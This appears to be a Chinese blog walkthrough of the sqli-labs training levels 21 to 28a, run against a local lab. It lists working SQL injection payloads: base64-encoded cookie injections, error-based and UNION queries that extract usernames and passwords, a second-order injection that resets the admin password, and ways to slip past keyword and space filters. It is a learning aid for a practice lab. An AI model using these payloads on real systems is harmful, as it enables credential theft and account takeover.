Sqli-Labs-Less21-37

珍惜现在,活在当下,行在今日

Less-21

1.直接用我们知道的用户名密码都为:admin的进行尝试,发现:

2.发现Cookie为:uname = YWRtaW4=说明对其进行了base64编码,那就编码看看:在线编码解码
YWRtaW4=就是admin,确实是base64编码,那就是说构造的语句也要进行base64编码。

还是在Cookie中构造:uname=admin' and extractvalue(1,concat('~',(select database()))) #编码后
uname=YWRtaW4nIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoJ34nLChzZWxlY3QgZGF0YWJhc2UoKSkpKSAj

结果报错,说明不止是单引号闭合,多了一个单引号,尝试加个括号:uname=admin') and extractvalue(1,concat('~',(select database()))) #编码后
uname=YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KCd+Jywoc2VsZWN0IGRhdGFiYXNlKCkpKSkgIw==

没用提错,说明为单引号加括号闭合。可是并没有回显我们需要的内容,看来这构造行不通。改一改,不直接用database() 构造为:admin') and extractvalue(1,concat('~',(select schema_name from information_schema.schemata limit 0,1))) # 编码后YWRtaW4nKSBhbmQgKHNlbGVjdCAxIGZyb20gKHNlbGVjdCBjb3VudCgqKSxjb25jYXQoKHNlbGVjdCBzY2hlbWFfbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5zY2hlbWF0YSBsaW1pdCAwLDEpLCc7JyxmbG9vcihyYW5kKCkqMikpIGFzIHggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYXMgYSkj

成功,这里用database()不行,因为自己太菜,目前也说不出个为什么,希望知道的大佬指点一下。之所以在这里从新构造,是因为下面的构造在开始时,用的也是database(),结果提示超过一行,但想着database()应该就是指security好像不需要limit n,1来限制,所以从新构造成这个形式。

3.换一种构造试试:admin') and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 0,1),';',floor(rand()*2)) as x from information_schema.tables group by x)as a)#
编码后:YWRtaW4nKSBhbmQgKHNlbGVjdCAxIGZyb20gKHNlbGVjdCBjb3VudCgqKSxjb25jYXQoKHNlbGVjdCBzY2hlbWFfbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5zY2hlbWF0YSBsaW1pdCAwLDEpLCc7JyxmbG9vcihyYW5kKCkqMikpIGFzIHggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYXMgYSkj

成功,剩下的稍微改改就好,改来改去,转来转去的,试得头疼。这题好像还提示日期配置错误,忙着做题了,没来的急处理,请大家自行忽略。后来查了一下,解决方法为:It is not safe to rely on the the system’s timezone settings解决方法 下面的已经处理好。


Less-22

1.先用我们知道的用户名密码都为:admin的进行尝试,发现:

感觉和Less-21相似,连返回的图片显示的都是SQLI DUMB SERIES-21(可能是弄错了)

2.那还是先尝试Cookie:把Less-21的语句提交看一下:admin') and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 0,1),';',floor(rand()*2)) as x from information_schema.tables group by x)as a)#
编码后:YWRtaW4nKSBhbmQgKHNlbGVjdCAxIGZyb20gKHNlbGVjdCBjb3VudCgqKSxjb25jYXQoKHNlbGVjdCBzY2hlbWFfbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5zY2hlbWF0YSBsaW1pdCAwLDEpLCc7JyxmbG9vcihyYW5kKCkqMikpIGFzIHggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYXMgYSkj

提示出错,应该是闭合方式不同。

3.尝试为双引号:admin" and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 0,1),';',floor(rand()*2)) as x from information_schema.tables group by x)as a)# 编码后:YWRtaW4iIGFuZCAoc2VsZWN0IDEgZnJvbSAoc2VsZWN0IGNvdW50KCopLGNvbmNhdCgoc2VsZWN0IHNjaGVtYV9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnNjaGVtYXRhIGxpbWl0IDAsMSksJzsnLGZsb29yKHJhbmQoKSoyKSkgYXMgeCBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgZ3JvdXAgYnkgeClhcyBhKSM=

成功。


Less-23

1.加单引号/加单引号加注释:http://localhost:8088/sqlilabs/Less-23/?id=1' --+都提示同样的错误:

也就是说注释符不起作用,可能是过滤了。

2.那通过语句闭合试试:成功http://localhost:8088/sqlilabs/Less-23/?id=1' and '1'='1

3.用使用联合查询:http://localhost:8088/sqlilabs/Less-23/?id=1' union select 1,2 and '1'='1 一列一列加发现有三列,不然会报错。

4.构造获取数据库名:http://localhost:8088/sqlilabs/Less-23/?id=-1' union select 1,(select schema_name from information_schema.schemata limit 0,1), '3

5.直接给出最终构造:http://localhost:8088/sqlilabs/Less-23/?id=-1' union select 1,(select concat(username,':',password) from users limit 1,1), '3


Less-24

1.看提示为:second order injections *Real Treat* stored injections 就是二阶注入/真正的享受/存储注入的意思。
2.先进页面看看,发现可以新建用户和用户登录,那先建一个试试。创建成功:

3.登录,发现可以修改密码:

4.根据提示的存储注入,想到可以构造一个新用户名(经测试用户名未进行相应过滤),使在更新此用户名的密码时,更新到其他账户密码。具体实现,考虑到密码重置语句为:update table_name set password='new_password' where username='username' and password='password' ;构造用户名:admin' or '1'='1 ,创建。登录,修改密码时,执行的语句应该为:update table_name set password='new_password' where username='admin' or '1'='1' and password='password' ; 则修改的便是账号admin的密码。如修改密码为:123456

修改后,使用密码123456登录发现,登录成功,说明构造成功。下面看一下表的内容,发现两个账号密码都已经被修改。

这里的构造其实是有问题的,因为使用or 导致凡是密码原为admin的账户密码都被修改为123456,而与用户名是不是admin无关(当然,用户名为admin的一定能修改成功),因为'1'='1' and password='admin'为真即达到条件,这也正是万能语句的精妙之处。

5.也可以这样构造,用户名为:admin' # 则执行的语句为:update table_name set password='new_password' where username='admin' #' and password='password' ; 也就是:update table_name set password='new_password' where username='admin' ; 测试发现,成功,此时修改账号admin密码为qwert


Less-25

这个题还是比较友好的,提示量大,不仅报错,还提示过滤后的内容。而且刚开始就说明andor 不可用了。然后尝试了一下,发现为单引号闭合。

使用联合查询

1.限制条件和联合查询关系不大,group by试出为3列。
2.使用联合查询,慢慢构造语句,先获取数据库名:http://localhost:8088/sqlilabs/Less-25/?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata --+ 报错:过滤后的内容为:

3.这个简单,改成http://localhost:8088/sqlilabs/Less-25/?id=-1' union select 1,group_concat(schema_name),3 from infoorrmation_schema.schemata --+ 成功。

4.获取表名:http://localhost:8088/sqlilabs/Less-25/?id=-1' union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security'--+
5.都挺简单的,只需要把有andor的都加上相应字母即可。

使用替代和报错注入

AND: && %26%26
OR: ||

1.使用extractvalue()构造,http://localhost:8088/sqlilabs/Less-25/?id=1' || extractvalue(1,concat(0x25,(select database())))--+

2.构造和之前一样,不多说,直接给出最终构造:http://localhost:8088/sqlilabs/Less-25/?id=1' || extractvalue(1,concat(0x25,(select concat(username,':',passwoorrd) from users limit 0,1)))--+

源码:

1
2
3

$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/AND/i',"", $id); //Strip out AND (non case sensitive)


Less-25a

1.加单引号,出错。后发现为数字型。
2.构造和Less-25一样。
3.发现无报错提示(只提示有无语句错误,即Less-25图片中显示的警告。关于此内容可查看提示Warning:mysql_fetch_array() expects),说明报错注入是不可用的,当然可以使用布尔型和时间延迟型。
源码:

1
2
$id= preg_replace('/or/i',"", $id);			//strip out OR (non case sensitive)
$id= preg_replace('/AND/i',"", $id); //Strip out AND (non case sensitive)


Less-26

1.提示过滤空格与注释,发现and && or也被注释,测试发现为单引号闭合。

1
2
3
4
5
6
7
$id= preg_replace('/or/i',"", $id);			//strip out OR (non case sensitive)
$id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive)
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --
$id= preg_replace('/[#]/',"", $id); //Strip out #
$id= preg_replace('/[\s]/',"", $id); //Strip out spaces
$id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes

2.看来只能使用替代了,空格的替代为:Blanks=('%09', '%0A', '%0B', '%0C', '%0D', '%0a')
3.试了以上替代,都未成功,先放着。


Less-26a

Less-26,为单引号加括号闭合。
源码:

1
2
3
4
5
6
7
8
$id= preg_replace('/or/i',"", $id);			//strip out OR (non case sensitive)
$id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive)
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --
$id= preg_replace('/[#]/',"", $id); //Strip out #
$id= preg_replace('/[\s]/',"", $id); //Strip out spaces
$id= preg_replace('/[\s]/',"", $id); //Strip out spaces
$id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes


Less-27

1.这次被过滤掉的有:(试到这实在试不下去了,主要是找到替代,为方便观看,直接把源码都贴上了,包括上面几题的也补充了):

1
2
3
4
5
6
7
8
9
10
11
12
$id= preg_replace('/[\/\*]/',"", $id);		//strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/select/m',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union/s',"", $id); //Strip out union
$id= preg_replace('/select/s',"", $id); //Strip out select
$id= preg_replace('/UNION/s',"", $id); //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id); //Strip out SELECT
$id= preg_replace('/Union/s',"", $id); //Strip out Union
$id= preg_replace('/Select/s',"", $id); //Strip out select

2.构造:http://localhost:8088/sqlilabs/Less-27/?id=0'%0aunIon%0aseLect%0a1,(seLect%0apassword%0afrom%0ausers%0awhere%0aid=1),'3


Less-27a

Less-27,为双引号闭合。
http://localhost:8088/sqlilabs/Less-27a/?id=0"%0aunIon%0aseLect%0a1,(seLect%0apassword%0afrom%0ausers%0awhere%0aid=1),"3
源码:

1
2
3
4
5
6
7
8
9
10
11
12
$id= preg_replace('/[\/\*]/',"", $id);		//strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/select/m',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union/s',"", $id); //Strip out union
$id= preg_replace('/select/s',"", $id); //Strip out select
$id= preg_replace('/UNION/s',"", $id); //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id); //Strip out SELECT
$id= preg_replace('/Union/s',"", $id); //Strip out Union
$id= preg_replace('/Select/s',"", $id); //Strip out Select


Less-28

源码:

1
2
3
4
5
6
7
$id= preg_replace('/[\/\*]/',"", $id);				//strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
//$id= preg_replace('/select/m',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id); //Strip out UNION & SELECT.

为单引号加括号闭合


Less-28a

源码:

1
2
3
4
5
6
7
//$id= preg_replace('/[\/\*]/',"", $id);				//strip out /*
//$id= preg_replace('/[--]/',"", $id); //Strip out --.
//$id= preg_replace('/[#]/',"", $id); //Strip out #.
//$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
//$id= preg_replace('/select/m',"", $id); //Strip out spaces.
//$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id); //Strip out spaces.

为单引号加括号


0%